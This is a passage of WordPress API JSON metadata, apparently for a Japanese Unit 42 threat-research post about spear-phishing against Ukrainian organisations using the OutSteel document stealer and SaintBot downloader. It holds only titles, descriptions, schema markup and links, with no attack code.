OutSteel\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u30b9\u30c6\u30a3\u30fc\u30e9\u306e\u307b\u304b\u3001SaintBot\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0\u304c\u5229\u7528\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u3053\u308c\u3089\u306e\u653b\u6483\u306f\u3088\u308a\u5927\u898f\u6a21\u306a\u653b\u6483\u306e\u4e00\u74b0\u3068\u3057\u3066\u884c\u308f\u308c\u305f\u3082\u306e\u3067\u3059\u3002\" \/>\n<meta property=\"og:url\" content=\"https:\/\/unit42.paloaltonetworks.com\/ja\/ukraine-targeted-outsteel-saintbot\/\" \/>\n<meta property=\"og:site_name\" content=\"Unit 42\" \/>\n<meta property=\"article:published_time\" content=\"2022-03-01T01:21:19+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-03-01T01:55:55+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2024\/06\/11_Cybercrime_Category_1920x900.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1920\" \/>\n\t<meta property=\"og:image:height\" content=\"900\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Unit 42\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"\u30a6\u30af\u30e9\u30a4\u30ca\u306e\u7d44\u7e54\u3092\u72d9\u3046\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u653b\u6483\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u306b\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u30b9\u30c6\u30a3\u30fc\u30e9\u306eOutSteel\u3084\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0\u306eSaintBot","description":"2\u6708\u4e0a\u65ec\u3001\u5728\u30a6\u30af\u30e9\u30a4\u30ca\u306e\u30a8\u30cd\u30eb\u30ae\u30fc\u95a2\u9023\u7d44\u7e54\u3092\u6a19\u7684\u3068\u3059\u308b\u653b\u6483\u304c\u78ba\u8a8d\u3055\u308c\u307e\u3057\u305f\u3002\u653b\u6483\u306b\u306f OutSteel\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u30b9\u30c6\u30a3\u30fc\u30e9\u306e\u307b\u304b\u3001SaintBot\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0\u304c\u5229\u7528\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u3053\u308c\u3089\u306e\u653b\u6483\u306f\u3088\u308a\u5927\u898f\u6a21\u306a\u653b\u6483\u306e\u4e00\u74b0\u3068\u3057\u3066\u884c\u308f\u308c\u305f\u3082\u306e\u3067\u3059\u3002","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/unit42.paloaltonetworks.com\/ja\/ukraine-targeted-outsteel-saintbot\/","og_locale":"ja_JP","og_type":"article","og_title":"\u30a6\u30af\u30e9\u30a4\u30ca\u306e\u7d44\u7e54\u3092\u72d9\u3046\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u653b\u6483\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u306b\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u30b9\u30c6\u30a3\u30fc\u30e9\u306eOutSteel\u3084\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0\u306eSaintBot","og_description":"2\u6708\u4e0a\u65ec\u3001\u5728\u30a6\u30af\u30e9\u30a4\u30ca\u306e\u30a8\u30cd\u30eb\u30ae\u30fc\u95a2\u9023\u7d44\u7e54\u3092\u6a19\u7684\u3068\u3059\u308b\u653b\u6483\u304c\u78ba\u8a8d\u3055\u308c\u307e\u3057\u305f\u3002\u653b\u6483\u306b\u306f OutSteel\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u30b9\u30c6\u30a3\u30fc\u30e9\u306e\u307b\u304b\u3001SaintBot\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0\u304c\u5229\u7528\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u3053\u308c\u3089\u306e\u653b\u6483\u306f\u3088\u308a\u5927\u898f\u6a21\u306a\u653b\u6483\u306e\u4e00\u74b0\u3068\u3057\u3066\u884c\u308f\u308c\u305f\u3082\u306e\u3067\u3059\u3002","og_url":"https:\/\/unit42.paloaltonetworks.com\/ja\/ukraine-targeted-outsteel-saintbot\/","og_site_name":"Unit 42","article_published_time":"2022-03-01T01:21:19+00:00","article_modified_time":"2022-03-01T01:55:55+00:00","og_image":[{"width":1920,"height":900,"url":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2024\/06\/11_Cybercrime_Category_1920x900.jpg","type":"image\/jpeg"}],"author":"Unit 42","twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/ukraine-targeted-outsteel-saintbot\/#article","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/ukraine-targeted-outsteel-saintbot\/"},"author":{"name":"Unit 42","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/a891f81d18648a1e0bab742238d31a63"},"headline":"\u30a6\u30af\u30e9\u30a4\u30ca\u306e\u7d44\u7e54\u3092\u72d9\u3046\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u653b\u6483\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u306b\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u30b9\u30c6\u30a3\u30fc\u30e9\u306eOutSteel\u3084\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0\u306eSaintBot","datePublished":"2022-03-01T01:21:19+00:00","dateModified":"2022-03-01T01:55:55+00:00","mainEntityOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/ukraine-targeted-outsteel-saintbot\/"},"wordCount":16043,"commentCount":0,"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/ukraine-targeted-outsteel-saintbot\/#primaryimage"},"thumbnailUrl":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2024\/06\/11_Cybercrime_Category_1920x900.jpg","keywords":["information disclosure","OutSteel","phishing","SaintBot","Ukraine"],"articleSection":["Threat Research","\u30de\u30eb\u30a6\u30a7\u30a2","\u8105\u5a01\u30ea\u30b5\u30fc\u30c1"],"inLanguage":"ja","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/unit42.paloaltonetworks.com\/ja\/ukraine-targeted-outsteel-saintbot\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/ukraine-targeted-outsteel-saintbot\/","url":"https:\/\/unit42.paloaltonetworks.com\/ja\/ukraine-targeted-outsteel-saintbot\/","name":"\u30a6\u30af\u30e9\u30a4\u30ca\u306e\u7d44\u7e54\u3092\u72d9\u3046\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u653b\u6483\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u306b\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u30b9\u30c6\u30a3\u30fc\u30e9\u306eOutSteel\u3084\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0\u306eSaintBot","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/ukraine-targeted-outsteel-saintbot\/#primaryimage"},"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/ukraine-targeted-outsteel-saintbot\/#primaryimage"},"thumbnailUrl":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2024\/06\/11_Cybercrime_Category_1920x900.jpg","datePublished":"2022-03-01T01:21:19+00:00","dateModified":"2022-03-01T01:55:55+00:00","author":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/a891f81d18648a1e0bab742238d31a63"},"description":"2\u6708\u4e0a\u65ec\u3001\u5728\u30a6\u30af\u30e9\u30a4\u30ca\u306e\u30a8\u30cd\u30eb\u30ae\u30fc\u95a2\u9023\u7d44\u7e54\u3092\u6a19\u7684\u3068\u3059\u308b\u653b\u6483\u304c\u78ba\u8a8d\u3055\u308c\u307e\u3057\u305f\u3002\u653b\u6483\u306b\u306f OutSteel\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u30b9\u30c6\u30a3\u30fc\u30e9\u306e\u307b\u304b\u3001SaintBot\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0\u304c\u5229\u7528\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u3053\u308c\u3089\u306e\u653b\u6483\u306f\u3088\u308a\u5927\u898f\u6a21\u306a\u653b\u6483\u306e\u4e00\u74b0\u3068\u3057\u3066\u884c\u308f\u308c\u305f\u3082\u306e\u3067\u3059\u3002","breadcrumb":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/ukraine-targeted-outsteel-saintbot\/#breadcrumb"},"inLanguage":"ja","potentialAction":[{"@type":"ReadAction","target":["https:\/\/unit42.paloaltonetworks.com\/ja\/ukraine-targeted-outsteel-saintbot\/"]}]},{"@type":"ImageObject","inLanguage":"ja","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/ukraine-targeted-outsteel-saintbot\/#primaryimage","url":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2024\/06\/11_Cybercrime_Category_1920x900.jpg","contentUrl":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2024\/06\/11_Cybercrime_Category_1920x900.jpg","width":1920,"height":900,"caption":"A glowing red padlock illuminated by ambient light sits on a wet surface with red particles floating around it, creating a mystical or high-tech atmosphere. The padlock appears sturdy and closed, symbolizing security or protection."},{"@type":"BreadcrumbList","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/ukraine-targeted-outsteel-saintbot\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/unit42.paloaltonetworks.com\/ja\/"},{"@type":"ListItem","position":2,"name":"\u30a6\u30af\u30e9\u30a4\u30ca\u306e\u7d44\u7e54\u3092\u72d9\u3046\u30b9\u30d4\u30a2\u30d5\u30a3\u30c3\u30b7\u30f3\u30b0\u653b\u6483\u3001\u30da\u30a4\u30ed\u30fc\u30c9\u306b\u30c9\u30ad\u30e5\u30e1\u30f3\u30c8\u30b9\u30c6\u30a3\u30fc\u30e9\u306eOutSteel\u3084\u30c0\u30a6\u30f3\u30ed\u30fc\u30c0\u306eSaintBot"}]},{"@type":"WebSite","@id":"https:\/\/unit42.paloaltonetworks.com\/#website","url":"https:\/\/unit42.paloaltonetworks.com\/","name":"Unit 42","description":"Palo Alto Networks","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/unit42.paloaltonetworks.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"ja"},{"@type":"Person","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/a891f81d18648a1e0bab742238d31a63","name":"Unit 42","image":{"@type":"ImageObject","inLanguage":"ja","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/image\/24dfba25c0e71d4de1836b78795bc2e5","url":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/Insights_headshot-placeholder-300x300.jpg","contentUrl":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/Insights_headshot-placeholder-300x300.jpg","caption":"Unit 42"},"url":"https:\/\/unit42.paloaltonetworks.com\/ja\/author\/unit42\/"}]}},"_links":{"self":[{"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/122148","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/users\/23"}],"replies":[{"embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/comments?post=122148"}],"version-history":[{"count":6,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/122148\/revisions"}],"predecessor-version":[{"id":122157,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/122148\/revisions\/122157"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/media\/134280"}],"wp:attachment":[{"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/media?parent=122148"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/categories?post=122148"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/tags?post=122148"},{"taxonomy":"product_categories","embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/product_categories?post=122148"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/coauthors?post=122148"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}